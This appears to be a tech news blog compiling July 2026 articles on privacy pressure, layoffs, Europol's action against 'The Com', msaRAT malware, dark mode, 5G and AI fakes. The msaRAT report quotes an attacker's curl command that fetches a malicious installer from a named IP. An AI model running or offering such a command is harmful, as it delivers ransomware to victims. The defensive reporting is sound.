Monday, July 27, 2026

 

TECH


The new technology battlefield isn't about AI, but a decision that could affect billions of users

Digital privacy has never been more central to technology discussions. While encrypted services promise to protect personal information, governments worldwide are intensifying requests for data access, citing public safety, criminal investigations, and the need to protect society. This landscape is forcing tech companies to rethink their strategies, architectures, and even business models to answer an increasingly difficult question: to what extent can user privacy be protected in the face of state pressure?

For years, tech companies invested heavily in encryption, advanced authentication, and secure storage to win user trust. The promise was simple: to offer services capable of protecting personal information even against increasingly sophisticated cyberattacks.

But the greatest challenge today doesn't necessarily come from hackers.

Governments around the world have ramped up requests for access to data held by digital platforms, creating a scenario where companies must balance legal obligations, public interests, and their commitments to millions of users.

A recent incident illustrates this dilemma well. An official request from the Swiss government for payment data helped identify a protester linked to the "Stop Cop City" movement in Atlanta, USA.

Although the company involved complied with the court order, the case reignited a crucial debate: how well does the privacy promised by digital services hold up when it clashes with the decisions of national authorities?

For many companies, this issue has moved beyond the legal realm to directly influence how their products are designed from the very start.

Encryption alone no longer solves the problem...For a long time, offering end-to-end encryption was considered a key selling point for privacy-focused platforms.

Today, experts point out that while this protection remains important, it is no longer sufficient to address current challenges. Providers of encrypted email, cloud storage, digital calendars, and productivity platforms have discovered that virtually any feature can become a potential point of regulatory pressure.

Features related to age verification, child protection, artificial intelligence, or service integration are increasingly attracting the attention of regulators, who often cite the public interest to justify new demands for access to information.

In this context, chief technology officers need to look beyond traditional security measures.

The focus has shifted to minimizing the amount of information stored by systems right from the source. The less data collected, the lower the impact should a company be legally compelled to disclose some of that information.

This philosophy—known as data minimization—is gaining traction precisely because it reduces exposure for both users and the companies themselves.

Business models have also become a form of protection...Regulatory pressure is prompting some companies to rethink their corporate structures.

Some organizations have adopted models controlled by foundations or non-profit entities, aiming to reduce conflicts between financial goals and privacy commitments.

The goal is to strengthen the company's independence from investors and reinforce the idea that user protection is central to its institutional mission.

However, experts point out that this strategy has its limits.

Even organizations structured this way remain subject to the laws of the countries where they operate.

In certain situations, governments may impose new surveillance rules, demand cooperation with investigations, or even threaten to restrict the operations of companies that fail to meet specific legal obligations.

This creates a complex dilemma for executives: whether to remain in strategic markets by accepting new regulatory demands or to exit certain regions to preserve the credibility they have built with users.

This decision carries increasingly significant financial, legal, and reputational implications.

Privacy has become a strategic decision, not merely a technological one...The current landscape shows that protecting personal information no longer depends solely on advanced algorithms or servers located in countries considered neutral.

Digital trust is increasingly influenced by geopolitical factors, court rulings, and constant changes in international law.

Experts argue that companies providing services in the public interest must acknowledge that a promise of absolute privacy is difficult to guarantee in the face of legal mandates issued by sovereign states.

Consequently, transparency is becoming increasingly important.

Publishing periodic reports on government requests, clearly explaining what data may be handed over to authorities, and outlining the technical limits of the protection provided are practices that are becoming key differentiators in maintaining user trust.

At the same time, technology executives are encouraged to develop systems that store the minimum amount of information possible from the design stage.

This strategy significantly reduces future risks and reinforces a concept gaining traction across the sector: the best way to protect data may simply be not to collect it.

In a landscape defined by geopolitical disputes and increasingly stringent regulations, digital privacy is evolving from a mere technological feature into a strategic choice that can shape the future of companies and the trust they have built with billions of users worldwide.

mundophone

Sunday, July 26, 2026


TECH


US tech companies have cut 140,000 jobs this year while accelerating AI investments

US technology companies have cut approximately 140,000 jobs since the beginning of the year, according to the *Financial Times*. This trend coincides with a surge in corporate investment in artificial intelligence (AI).

An analysis by the *Financial Times*, based on company filings and data from executive outplacement firm Challenger, Gray & Christmas, indicates that the sector accounted for more than a third of all layoffs announced in the country during this period. According to the British newspaper, Amazon, Oracle, Meta, and Microsoft are responsible for nearly 50,000 of these cuts—equivalent to about 6% of their corporate workforces.

Analysts interviewed by the *Financial Times* suggest the layoffs reflect both a correction following a hiring spree and a need to redirect resources toward the AI ​​race.

According to the newspaper, Amazon, Alphabet, Meta, and Microsoft are expected to invest a combined $725 billion this year in infrastructure, primarily data centers. Oracle, meanwhile, plans to allocate another $70 billion to similar facilities to serve clients such as OpenAI.

Some companies attribute part of the job cuts to productivity gains driven by artificial intelligence. Data from Challenger shows that approximately 170,000 corporate job cuts have been linked to AI since May 2023. Block, led by Jack Dorsey, is one example: the company laid off nearly half of its roughly 10,000 employees in May, stating in a memo to staff that AI was altering its staffing needs.

Despite record investments in artificial intelligence, US tech companies are continuing to reduce their workforce at a rapid pace in 2026. The sector has already eliminated approximately 140,000 jobs since the beginning of the year, according to an analysis by the Financial Times, based on company disclosures and data from Challenger, Gray & Christmas, a labor market research firm.

According to the analysis, published on Saturday, July 25, 2026, the tech sector accounted for more than a third of all job cuts announced in the US during the same period. Amazon, Oracle, Meta, and Microsoft alone accounted for approximately 50,000 of the total job reductions, representing about 6% of their combined workforce.

Major tech companies are ramping up their spending on artificial intelligence infrastructure. Amazon, Alphabet, Meta, and Microsoft are expected to spend around $725 billion on data center construction this year. Oracle also plans to invest $70 billion in new data centers to serve its clients, including OpenAI.

Oracle ended its 2026 fiscal year with approximately 21,000 fewer employees than the previous year, following cuts announced in March. This came amid pressure on its balance sheet, which led Standard & Poor's to downgrade its credit rating to just one notch above junk status due to weak cash flow and uncertainty surrounding the future returns on its AI investments.

Microsoft also eliminated around 4,800 jobs in July, mostly within its Xbox gaming division, as part of a restructuring plan three years after its $75 billion acquisition of Activision Blizzard.

Data from Challenger indicates that around 170,000 jobs in companies have been linked to artificial intelligence since May 2023. Some companies have used this justification to explain their decisions, as Jack Dorsey, CEO of Block, said that artificial intelligence changed the company's workforce needs, after it laid off about half of its 10,000 employees.

However, researchers interviewed by the *Financial Times* dispute this explanation, suggesting it may serve to justify adjustments necessitated by the excessive hiring of recent years.

At the same time, major tech companies have begun to avoid directly linking layoffs to AI. Amazon and Microsoft, for instance, have stated that the implementation of the technology was not the reason for reducing their workforces. Despite the reduction in job openings at major companies, this trend is not reflected across the entire sector. According to the FT, AI-focused startups such as OpenAI and Anthropic continue to expand their teams, helping to mitigate some of the impact of the layoffs.

mundophone


TECH


Europol dismantles "The Com" network's digital infrastructure

Europol, in coordination with law enforcement agencies from nine European countries, identified and moved to take down 4,340 URLs linked to "The Com" network during June and July 2026. This technical intervention aimed to dismantle the online infrastructure of an organization associated with violent extremism and the sharing of child sexual abuse material, with the goal of halting the recruitment and systematic extortion of minors online.

Law enforcement authorities confirm that "The Com" network operates without a structured ideology or central command. The organization is characterized by a nihilistic and misanthropic belief system, in which the use of violence often serves as an end in itself. Certain factions within the network adopt right-wing violent extremist doctrines and accelerationist theories.

The goal stated by these subgroups involves the collapse of social structures—a scenario promoted through physical attacks and the explicit corruption of younger demographics. The European Union Internet Referral Unit (EU IRU), a Europol entity, coordinated the operation in partnership with Spain's Intelligence Center against Terrorism and Organized Crime (CITCO).

This criminal ecosystem utilizes social media platforms, messaging apps, and video games to groom and radicalize members. Recruitment techniques involve distributing seemingly harmless propaganda across public, accessible platforms. Social media algorithms redirect vulnerable young people toward this content, creating a digital path that funnels victims into private forums or closed chat rooms.

Within these restricted spaces, the violence takes on severe physical and psychological dimensions. Criminals incite self-harm, animal torture, and the production of child sexual abuse material. Victims are kept under the network's control through sexual extortion, commonly known as "sextortion." Europol Operation 2026: Factual Data

-Operation Period: June and July 2026.

-Technological Assets: 4,340 URLs submitted for removal (“Referral Action Days”).

-Participating Countries: Portugal, Belgium, Finland, Hungary, Ireland, Luxembourg, the Netherlands, Spain, and Sweden.

-Identified Crime Categories: Child sexual abuse, physical mutilation, animal cruelty, and unstructured terrorism.

Material disseminated within the extremist infrastructure serves to amplify the notoriety of groups or individual profiles. Producing extremist material yields reputational gains within the group—a social dynamic where creating or sharing the most violent content confers power over victims. This material often transitions into live broadcasts featuring an audience and support from other members.

The group’s terminology includes practices such as “blood walls” and “cutting signs.” Members use blood to draw symbols or force individuals to carve the extortionist’s name into their own skin. Images or videos of these acts fuel the infrastructure and legitimize the perpetrator in the eyes of the group. Online terrorist content blends Satanist symbols with the lexicon of violent right-wing extremism.

Law enforcement efforts intercept guides for manufacturing explosives and threats of doxing... Police detected circulating technical manuals designed to instruct young people on how to manufacture improvised explosives, orchestrate attacks in public spaces (referred to as “manhunts”), commit arson, and carry out homicides. The documentation also includes tutorials on radicalization techniques and the sexual exploitation of minors.

Perpetrators use doxing and swatting methods to terrorize victims or critics. The tactic involves stealing and exposing personal data online to trigger a hoax call to the police. The perpetrator reports a fake homicide scenario at the victim's address, resulting in an armed police intervention at the scene. The attack aims to deeply intimidate the target.

The official report "European Union Terrorism Situation and Trend Report" (EU TE-SAT 2026) officially classifies nihilistic violent extremism as a destabilizing ideological factor and notes deliberate attempts to sabotage the structures of modern societies. Europol’s European Counter Terrorism Centre (ECTC) confirms that this ecosystem poses a major global risk, with a primary focus on the corruption of minors—casting them in the roles of both victim and perpetrator.

The ECTC has received hundreds of requests for formal assistance from European Union Member States regarding offenses linked to these networks. The response to this issue is combined with the “COMPASS” project and the European Commission’s “ProtectEU” program—initiatives that aim to actively monitor the exploitation of young people in virtual environments such as video game consoles and social media platforms.

According to an official Europol statement, an estimated 4,340 URLs linked to nihilistic violent extremism were flagged during an initiative organized by the EU Internet Referral Unit (EU IRU) and the Spanish Intelligence Centre against Terrorism and Organised Crime (CITCO). The operation took place over several weeks: throughout June and July 2026, Europol supported an action targeting online nihilistic violent extremist content. Researchers from nine countries participated in these "Referral Action Days" with the shared goal of disrupting "The Com's" online ecosystem, limiting the spread of propaganda, and uncovering new investigative leads.

A distinction highlighted by various analyses is important: flagging or referring content is not the same as confirming its removal. Authorities reported the addresses to online service providers, but this does not necessarily mean there was independent confirmation that every link had actually been taken down. Nevertheless, a coordinated flagging campaign can significantly reduce access to harmful material, generate intelligence for ongoing cases, and expose patterns of platform usage by extremist and criminal networks.

This action is part of a broader framework. It complements the efforts of Project COMPASS—coordinated by Europol’s European Counter Terrorism Centre (ECTC)—which brings together law enforcement authorities from EU Member States and external partners to combat "The Com."

What is "The Com"? The name derives from "Community." Europol describes it as a diffuse network of fringe online groups adhering to a misanthropic, nihilistic worldview—lacking a unified ideology or centralized structure—where violence is often an end in itself. Some factions have adopted violent far-right beliefs and accelerationist views, seeking to hasten societal collapse through violent attacks and the corruption of youth.

It operates like a funnel. Affiliated groups recruit and groom victims via social media, messaging apps, and gaming platforms, coercing them into self-harm, violence, and the production of child sexual abuse material—often through extortion. They distribute propaganda on accessible platforms to attract young people, steering potential members and victims toward private forums and chat rooms where radicalization and victimization take place; victims are typically coerced into remaining under the perpetrators' influence through sexual extortion.

The network is organized into subgroups with distinct focuses. According to a Europol report published earlier this month, "Cyber ​​Com" focuses on activities such as distributed denial-of-service (DDoS) attacks, doxing, swatting, and ransomware, while "Offline Com" groups primarily engage in real-world attacks, such as arson, stabbings, or homicide. Sexual extortion groups groom and extort—primarily—underage girls into performing sexual or violent acts; these acts are recorded and subsequently used to coerce the victims into committing increasingly degrading deeds.

The internal logic is competitive and cruel. According to Europol, the more extreme and harmful the content a user or group manages to produce or extort, the higher their status within the online community. These acts are frequently livestreamed on social media platforms—where viewers offer encouragement—and are later saved and disseminated. Flagged content has included so-called "blood walls"—paintings made with blood displaying the extortionist's pseudonym and affiliation—and "cut-signs," where victims are forced to carve the extortionist's name into their own bodies.

Regarding the results of Project Compass, Europol reported that the year-long coordinated operation led to 30 arrests and identified 179 suspects linked to "The Com," with investigators identifying 62 victims and directly protecting four of them. Launched in January 2025 and led by the ECTC, it brought together authorities from 28 countries. The scale of the problem is indicated by the demand itself: over the past two years, the ECTC has observed the network evolve into a global threat—particularly regarding minors acting as both victims and perpetrators—having received hundreds of requests from Member States and third parties concerning crimes committed within "The Com."

How flagging works at the European level...The EU IRU, based in The Hague, is the European instrument for this type of operation. It detects, analyzes, and flags publicly available online content related to terrorism and violent extremism, aiming to restrict its accessibility and facilitate the attribution of crimes and the prosecution of perpetrators. "Referral Action Days" are part of this set of capabilities and can be either thematic or platform-specific: thematic actions are flagging campaigns targeting online content related to a specific theme identified across multiple platforms.

It is worth distinguishing between two regimes. There is voluntary flagging, where content is assessed by the platform against its terms of service, and there is the binding mechanism established by Regulation (EU) 2021/784 on addressing the dissemination of terrorist content online. This regulation aims to ensure the rapid removal of publicly accessible terrorist content through cooperation and coordination among Member States, Europol, and hosting service providers, applying to all entities offering services in the EU. Voluntary cooperation through flagging coexists with these binding instruments.

mundophone

Saturday, July 25, 2026


TECH


Scrappy RAT malware targets billions of Chrome and Edge users

A new remote access trojan (RAT) has been discovered by the cybersecurity research team at Cisco Talos, and experts are sounding the alarm since it enables the installation of ransomware on the victim's system. The attack is dubbed msaRAT and attributed to the Chaos ransomware group, built with Rust to utilize existing Chrome or Edge (Chromium-based) browser installations. By leveraging the browser's ordinary communication methods, msaRAT is able to disguise its traffic with Chrome's DevTools Protocol and enable command-and-control (C2) communications without detection from typical anti-malware or antivirus software.

Once the attackers have successfully infiltrated a target network with msaRAT malware, numerous possibilities emerge. The malware runs via a headless (no window/invisible) browser process and can be used to perform remote code execution on the target machines. Besides opening the door for the Chaos group's ransomware, it also enables covert data theft and more.

While the potential scale of msaRAT attacks could extend to the entirety of Microsoft Edge and Google Chrome's userbase, the Chaos ransomware group typically targets large organizations. Common users could still be targeted, but the information shared by Cisco Talos doesn't include examples or an estimated scope of msaRAT attacks, and just identifies the novel approach and hard-to-detect nature of msaRAT.

Additionally, msaRAT is an example of post-compromise malware, that is, malware already installed through phishing emails or malicious files. It cannot be mitigated through browser patches, and because of its novel approach, traditional firewalls and network monitoring tools will most likely fail if defenders are not aware of the specific nature of the attack.

To protect from msaRAT, Cisco Talos advises adding the following SNORT rules (SIDs) to detect and block it:

Snort 2: 1:66840, 1:66841, 1:66839

Snort 3: 1:301587, 1:66839

Or adding the following ClamAV signature:

Win.Downloader.ChaosRaas-10060321-0

For manual searches or use with other tools, the only Indicators of Compromise (IoC) are traffic being sent to these destinations:

172.86.126.18

is-01-ast.ols-img-12.workers.dev

While most users aren't going to be targeted by an attack like this, we advise any readers tied to a large enterprise to utilize the above information appropriately or send it to your relevant IT staff. If msaRAT does appear on a system, the time window between then and ransomware installation is thin, and confidential data exfiltration may have already occured.

Chaos is a ransomware-as-a-service (RaaS) group whose activity was first confirmed in February 2025. Although the number of listings on their data leak site remains relatively low, the group consistently targets large organizations and employs double extortion tactics. For initial access, they rely on spam emails and voice-based social engineering, commonly known as vishing. Once inside a network, their traditional post-compromise methodology involves abusing remote monitoring and management (RMM) tools to establish persistent access, while leveraging legitimate file-sharing software to exfiltrate data. For a detailed breakdown of their tactics, techniques, and procedures (TTPs)

Infection chain...Talos has identified a new Rust-based RAT used by the Chaos ransomware group, which we have named msaRAT. The name is derived from the binding names found in the binary (“msaOpen,” “msaClose,” “msaError,” “msaMessage”), as detailed in a later section. Figure 2 illustrates the end-to-end infection chain, from initial compromise through to the establishment of C2 communications via this RAT.

After gaining access to a victim machine but prior to executing the ransomware, the attacker runs the following curl command to download an MSI file named “update_ms.msi” from an attacker-controlled server to the ProgramData directory on the victim machine, then executes it. Although port 443 is specified, the communication occurs over plain HTTP. In environments where firewall rules permit traffic based solely on port number without protocol inspection, this traffic will pass through undetected.

curl.exe http://172.86.126.18:443/update_ms.msi -o C:\programdata\update_ms.msi

The property information of this installer, which extracts the DLL file containing the RAT payload, contains details configured to impersonate a Windows update.

When this MSI file is executed, the custom action CA_Run_EA2AEBC3 is triggered upon completion of InstallFinalize. This custom action loads lib.dll, embedded in the MSI file's Binary table as Bin_lib_EA2AEBC3, directly into memory.

lib.dll (msaRAT)...msaRAT is written in Rust and implemented using the asynchronous runtime Tokio. Its primary capabilities include browser-leveraged reverse shell and covert tunneling to establish communications with a C2 server. The export table of “lib.dll” exposes a function named RUN, which is designed to be called by the installer described above. Based on the actual logs, after downloading this malware, we have confirmed the existence of a ransom note.

Tokio runtime initialization...Tokio is a runtime for executing asynchronous operations in Rust. While Rust's async/await provides the syntax for writing asynchronous code, it cannot execute on its own — a runtime like Tokio is responsible for scheduling and running asynchronous tasks.

As the first step within the RUN function, the malware initializes Tokio to enable asynchronous processing. Multiple strings statically embedded in the binary — including TOKIO_WORKER_THREADS and the number of hardware threads is not known for the target platform — match source code from both Tokio and the Rust standard library, confirming this initialization behavior.

During initialization, the malware determines the number of worker threads for parallel execution. It first reads the TOKIO_WORKER_THREADS environment variable. If the variable is not set or is empty, it calls the Windows API GetSystemInfo to retrieve the CPU count and uses that value to set the worker thread count. If dwNumberOfProcessors written by GetSystemInfo returns 0, the worker count is set to 1. Once the initial values are configured, the Tokio runtime is started, and OS threads equal to the number of workers are created and launched via the CreateThread API.

By leveraging Tokio, this RAT can concurrently execute multiple operations — such as receiving frames from the C2, sending CDP commands to the browser, and processing key exchanges — without any operation blocking another. For example, even while an ECDH key exchange is in progress, the reception and processing of other frames continues uninterrupted.

mundophone

 

DIGITAL LIFE


Dark mode or light mode? Dark mode gained popularity for saving battery and being easier on the eyes, but the reality is more complex

Dark mode has become a favorite feature among smartphone users. Found in virtually all operating systems and apps, it promises greater visual comfort, longer battery life, and even better sleep. But do these advantages really hold true in every situation? Recent studies show that the answer depends on several factors and that many myths still surround this setting.

You simply need to open your phone's settings to find the option to enable dark mode. The interface replaces traditional light backgrounds with shades of black or gray, offering a look that many users consider more elegant and less harsh on the eyes.

However, experts warn that the benefits aren't universal. The experience varies depending on the screen type, brightness level, ambient lighting, and even an individual's specific vision characteristics.

At night or in dimly lit environments, for instance, dark mode often provides a more comfortable experience. Since the screen emits less perceived light, the contrast between the smartphone and the surroundings decreases, reducing glare when checking messages or browsing for a few minutes.

However, this doesn't mean the feature eliminates eye strain caused by prolonged screen use. According to the American Academy of Ophthalmology, visual discomfort is more closely linked to excessive time spent in front of the device, improper brightness, screen reflections, viewing distance, and a reduced blinking rate.

Another important point is that there is no consistent scientific evidence showing that the light emitted by smartphones causes direct retinal damage during normal use. The sensation of tired eyes after hours of using the device is usually linked to the continuous effort of focusing and to dry eyes, rather than whether the interface is light or dark.

Furthermore, for those who spend long periods reading text, light mode may still be the better option. Several studies indicate that reading tends to be faster and more accurate when dark letters appear against a light background.

This occurs because lighter surfaces cause the pupil to constrict, increasing the sharpness of small letters. In dark mode, however, the pupil remains more dilated, which can make white characters appear slightly blurred or surrounded by a faint glow, especially with small font sizes.

Among all the advantages attributed to dark mode, energy savings is the one with the strongest technical backing. However, this does not occur in the same way across all devices.

The greatest benefits are seen in smartphones equipped with OLED or AMOLED screens. In these panels, each pixel generates its own light. When an area of ​​the screen displays absolute black, those pixels simply remain off, thereby reducing energy consumption.

Devices with LCD screens operate differently. They feature a backlight that remains on regardless of the color being displayed. Even when the interface shows a black background, this light stays active, making the difference in power consumption quite limited.

Researchers at Purdue University analyzed this behavior and observed that, under normal usage conditions with auto-brightness enabled, the energy savings achieved by dark mode on OLED devices typically range from approximately 3% to 9%.

When brightness is set to very high levels, this reduction can approach 40%. However, this scenario represents a specific situation far removed from most people's daily usage habits.

App design also plays a role. Interfaces using absolute black save more energy than those relying solely on shades of gray. Photos, videos, animations, and colorful elements also diminish this energy-saving advantage.

Another common misconception is the belief that dark mode alone improves sleep quality. While it reduces the amount of light emitted by the screen at night, it does not completely eliminate the effects of prolonged phone use before bedtime. Exposure time, high brightness levels, and even the content being consumed continue to influence the circadian rhythm and the ease of falling asleep.

Dark Mode consumes more battery...Many users employ Dark Mode in browsers or apps to reduce eye strain or, in some cases, to save device power. However, this attempt to conserve energy can backfire—causing users to consume more power than they save—according to research by the BBC.

This new study was conducted by BBC Research & Development, which explains that when opting for Dark Mode, some users may end up increasing screen brightness beyond the levels typically used for Light Mode pages or apps.

The research team asked participants to adjust the screen brightness to their preferred level of comfort, aiming to better understand their usage habits.

The study found that 80% of participants significantly increased screen brightness after enabling Dark Mode. This increase caused the laptop's battery to drain much faster than when using lower brightness settings on a page in Light Mode.

While the result might seem obvious, it highlights a common pitfall: users who activate Dark Mode to save energy often end up increasing brightness to see the content more clearly, thereby negating the intended savings.

For this reason, experts recommend combining dark mode with reduced brightness, warmer light filters, easy-to-read fonts, and frequent breaks during use. During the day, light mode may still offer better readability. At night, dark mode tends to provide a more pleasant experience.

Ultimately, there is no single ideal setting for everyone. The best choice is one that adapts to the environment, ensures good readability, avoids excessive glare, and provides comfort during daily smartphone use.

 

mundophone

Friday, July 24, 2026


TECH


Ookla: AI creates new paradigms for 5G quality; speed no longer tells the whole story about the network

Ookla states that artificial intelligence has profoundly changed the definition of a good mobile network, rendering the traditional download speed metric insufficient for predicting real-world performance. According to the report, networks topping download speed rankings are not necessarily the best prepared for AI traffic, as the experience of these applications depends primarily on upload capacity, network behavior under load, and the consistency of the path to the cloud.

The document redefines the industry benchmark based on what AI actually demands from 5G networks, assessing where they are ready and where they still fall short.

Ookla explains that AI traffic is not homogeneous; text, conversational voice, multimodal systems, augmented reality (AR) vision, generated video, and agent activity all place different demands on the network—often in areas that download speed metrics have never captured. According to Ookla, the shift driven by AI relates less to raw capacity and more to the new traffic profile.

This traffic is upload-heavy, continuous, and prone to spikes, rather than being download-centric and session-based. The report also seeks to determine whether current 5G networks are prepared for these workloads, concluding that the answer depends on metrics that have historically received little attention.

Based on Speedtest Intelligence data collected in 2025—covering 22 markets and 86 operators—the study measures upload capacity, latency under load, and cloud-path quality, identifying where current 5G falls short of AI requirements. The key takeaway is that download speed is an unreliable indicator of technology readiness.

Markets such as Singapore, the United Arab Emirates, Malaysia, Finland, and Australia lead in baseline latency, despite not necessarily being the fastest in terms of download speeds, the document notes. The case of India appears to illustrate this divergence, as it misses the latency target for text-based AI despite ranking ninth in download speed among the markets studied.

The report concludes that networks are generally prepared for text-based AI but not for more demanding workloads. Eighteen of the 22 markets studied meet the latency target for text-based AI, and 13 meet the target for conversational voice, with Singapore and the United Arab Emirates leading the way.

The four markets that miss the text target are only slightly above the threshold. However, no market hits the latency target for augmented reality and multimodal vision. Only Singapore meets the more lenient 30 ms minimum, demonstrating that the most demanding modalities remain beyond the reach of current 5G technology.

Upload gaps for AI...The biggest gap identified in the study concerns upload speeds. 5G networks were built on the assumption that users consume more data than they produce, but AI flips this logic, Ookla explains. Text traffic currently operates with a split of approximately 29% upload and 71% download, whereas the workloads of conversational systems and AI agents approach a 50/50 split. Despite this, operators continue to dedicate only about 10% of capacity to uploads.

In more than half of the markets, this proportion has decreased since 2023, even amidst absolute increases in upload speeds. The report highlights that Indonesia leads in upload share, although it also recorded the largest drop.

Conversely, Germany is the only market to increase this share, thanks to targeted investments in the sector. In terms of absolute speed, the United Arab Emirates leads with 57.50 Mbps—more than four times the speed of any U.S. operator—while South Korea demonstrates the limitations of a single-band strategy. Latency remains stable under normal conditions but degrades significantly under load, with marked variations across markets. Degradation rates range from 3.7 times in the UK to 11.4 times in Thailand, where loaded latency reaches 960.3 ms.

The company warns that this metric can be misleading: Singapore has the lowest baseline latency but one of the highest degradation rates, whereas the United Arab Emirates has the lowest loaded latency—a figure more relevant to the speeds required for AI. Variation within each market is also significant, as illustrated by the UK, where different carriers exhibit widely differing latencies.

The path data takes to reach the cloud emerges as another critical factor. While upload and baseline latency end at the network edge, the remainder of the journey to the server where the model runs proves decisive. In markets like Australia, the gap between the fastest and slowest cloud providers reaches 96.6 ms—enough to compromise voice applications and AI agents.

"In Europe, the landscape is more uniform, with minimal differences between cloud providers; however, Brazil exhibits high and similar latencies across clouds due to infrastructure concentration and limited peering," states Ookla.

The report adds that jitter—the variation or fluctuation in data packet delivery delay across a network—is equally crucial. Although markets may appear similar in terms of median performance, significant differences emerge at the 90th percentile: South Korea, Norway, and Singapore demonstrate the most stable connections, whereas the Philippines and Malaysia show greater variability.

Ookla concludes that speed and stability are distinct attributes, and that the markets best positioned for real-time AI are those that maintain consistent timing.

mundophone

 

DIGITAL LIFE


Real or fake? AI videos simulate movie behind-the-scenes footage, confusing internet users and going viral on social media

In a matter of seconds, a video can travel across the globe, garner millions of views, and spark immediate reactions on social media. The problem is that, increasingly, these videos depict situations that never actually happened.

In recent years, content created by artificial intelligence has begun to replicate human faces, voices, and gestures with a level of realism capable of fooling even attentive users. In a fast-paced digital environment where verification often follows sharing, this type of technology has become fertile ground for misinformation.

A few famous examples illustrate the phenomenon. During the war between Russia and Ukraine, a manipulated video showed Ukrainian President Volodymyr Zelenskyy seemingly calling on soldiers to surrender. The content was fake but circulated rapidly online before being debunked. In another instance, a deepfake of Nvidia CEO Jensen Huang was used in a fraudulent broadcast to promote a cryptocurrency scam.

Amidst geopolitical tensions—such as the recent escalation involving Iran, Israel, and the United States—experts warn that manipulated videos could emerge to sway public opinion or fuel political narratives.

According to a study published by DeepStrike, the number of deepfakes available online grew from around 500,000 in 2023 to a projected figure of over 8 million by 2025, while fraud involving this technology surged by 3,000% during the same period. The study also reveals that only 24.5% of people can correctly identify fake videos when they are of high quality.

For creative director and digital strategist Náthan Ximenes, founder of NTX Group, the evolution of technology demands a new mindset from the public regarding the images circulating online. "For a long time, we believed that video was proof. With artificial intelligence, that has changed. Today, images can be easily produced and circulated before any verification takes place."

Given this landscape, learning to recognize potential signs of manipulation has become an essential skill for anyone consuming information on social media. Although artificial intelligence systems are becoming increasingly sophisticated, Ximenes points out that there are still technical indicators that can help identify artificially generated videos.

One of the most common signs lies in the synchronization between voice and mouth movements. In many deepfakes, the lips do not perfectly match the words or exhibit slight delays. Another area to watch is the eyes and facial expressions, which may appear stiff or repetitive, as replicating human micro-expressions remains a challenge for many video generation models.

It is also worth noting environmental details, such as subtle lighting changes on the face, slightly distorted hairlines, or shadows that do not match the setting. In some cases, the audio quality itself can raise suspicions. AI-generated voices tend to have a uniform intonation, lacking natural pauses, breathing, or emotional variation.

According to Náthan, the public needs to develop a more critical eye regarding digital content. "Technology has evolved very rapidly, making it possible to produce extremely convincing videos in just a few minutes. That is why checking the source and context is just as important as observing the video's technical details," he states.

Another essential precaution is verifying the content's origin. Videos shared by unknown profiles—lacking references to dates, locations, or reliable sources—warrant extra scrutiny. Often, a quick search for news reports or the official channels of the person mentioned is enough to confirm whether the event actually took place.

In a digital landscape where images can be easily fabricated, experts say that media literacy is becoming just as important as knowing how to use the technologies themselves. Now more than ever, seeing is no longer a guarantee of truth.

As Ximenes sums it up: "Artificial intelligence has opened up incredible possibilities for audiovisual production, but it has also brought a new challenge. Today, before believing a video, we need to learn to ask whether the event actually happened."

Videos supposedly showing behind-the-scenes footage of major film productions are going viral on social media, yet in many cases, the filming never actually took place.

One recent example features scenes of a massive water tank with artificial waves, film crews, and a set-piece ship. Posts claim this shows the making of *Tsunami* (2009), a South Korean blockbuster about a tsunami. In other versions, the same video appears as behind-the-scenes footage for different films—even *The Odyssey*, an epic by Christopher Nolan currently showing in theaters.

However, expert content creators point out several signs that the scenes are synthetic—such as Osmar Portilho, a journalist and videomaker with over 83,500 followers.

Clues include cameras that do not resemble real film equipment, disproportionate vehicles, people moving illogically on set, and an entire crew positioned next to a pool about to be flooded, with no protection for the equipment or the professionals.

Another detail stands out: the same city model appears in videos claiming to depict completely different locations, such as Paris and New York—an inconsistency typical of content produced by generative models.

The videos also exploit an element that tends to boost credibility: public curiosity about the behind-the-scenes aspects of major productions. By combining industrial settings, green screens, cranes, cameras, and special effects, AI tools can produce content that looks plausible at first glance.

mundophone

  TECH The new technology battlefield isn't about AI, but a decision that could affect billions of users Digital privacy has never been ...